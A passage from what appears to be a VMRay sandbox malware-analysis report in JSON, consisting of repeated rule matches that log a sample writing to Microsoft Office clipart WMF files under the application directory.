"rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01568_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01569_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01569_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43384", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01569_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01575_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01575_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43393", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01575_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01777_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01777_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43404", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01777_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01785_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01785_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43411", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01785_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01805_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01805_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43420", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01805_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01905_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01905_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43427", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01905_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01954_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01954_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43434", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01954_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02009_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02009_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43441", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02009_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02022_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02022_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43448", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02022_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02024_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02024_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43455", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02024_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02025_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02025_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43462", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02025_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02028_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02028_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43469", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02028_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02045_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02045_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43476", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02045_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02048_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02048_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43483", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02048_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02051_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02051_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43490", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02051_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02054_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02054_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43497", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02054_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02055_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02055_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43504", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02055_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02067_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02067_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43513", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02067_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02094_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02094_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43520", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02094_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02227_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02227_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43527", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02227_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02228_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02228_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43534", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02228_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02233_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02233_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43541", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02233_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02252_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02252_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43548", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02252_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02253_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02253_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43555", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02253_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02261_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02261_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43562", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02261_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02263_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02263_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43569", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02263_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02265_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02265_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43576", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02265_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02268_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02268_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43583", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02268_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02269_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02269_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43590", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02269_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02270_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02270_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43597", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02270_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02276_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02276_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43604", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02276_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02413_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02413_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43611", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so02413_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02431_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02431_.wmf", "operations": [ "write" ], "type": 